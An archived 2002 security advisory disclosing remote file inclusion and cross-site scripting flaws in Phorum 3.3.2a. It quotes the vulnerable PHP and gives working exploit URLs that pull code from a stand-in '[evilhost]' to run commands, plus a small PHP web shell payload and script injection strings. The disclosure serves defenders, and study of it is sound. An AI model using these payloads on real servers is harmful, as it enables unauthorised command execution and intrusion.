Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: web5352.htm

Phorum remote command execution



21th May 2002 [SBWID-5352]
COMMAND

	Phorum remote command execution

SYSTEMS AFFECTED

	Phorum 3.3.2a

PROBLEM

	Markus Arndt [markus-arndt@web.de] [http://skka.de] found :
	

	

	  1

	 ===

	

	After extracting the Phorum 3.3.2a archive we have  lots  of  php  files
	and subfolders. I  just  snooped  around  a  bit  and  found  this  file
	vulnerable for remote script inclusion:
	

	./plugin/replace/plugin.php

	

	let\'s see some code:
	

		<?php

		include(\"$PHORUM[settings_dir]/replace.php\");

	

		function mod_replace_read_body ($body) {

		  global $pluginreplace;

		  reset($pluginreplace);

		  while(list($key,$val) = each($pluginreplace)) {

		    $body = str_replace($key,$val,$body);

		  }

		  return $body;

		}

	

		$plugins[\"read_body\"][\"mod_replace\"]=\"mod_replace_read_body\";

	

		?>

	

	Easy one..
	

	http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

	

	This one will get the  file  http://[evilhost]/replace.php  and  execute
	it. If [evilhost] has php enabled we could use this one as replace.php:
	

		<?

		echo(\"<?

		system(\\\"\\$cmd\\\");

		?>\");

		?>

	

	If it\'s not php-enabled simply:
	

		<?

		system(\"$cmd\");

		?>

	

	

	

	  2

	 ===

	

	Another  bug   for   remote   command   execution.   This   time   it\'s
	admin/actions/del.php :)
	

	Some code:
	

	<?php

	    require \"$include_path/delete_message.php\";

	    delete_messages($id);

	    QueMessage(\"Message(s) $id and all children were deleted!<br>\");

	?>

	

	The url to exploit the script would be:
	

	http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls

	

	That      url       will       make       the       script       include
	http://[evilhost]/delete_message.php
	

	

	  3

	 ===

	

	CSS-Attacks are possible on 2 files..
	

	http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert(\"css strikes!\");</script>

	http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert(\"css strikes!\");</script>

	

SOLUTION

	Yes, patch is out.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH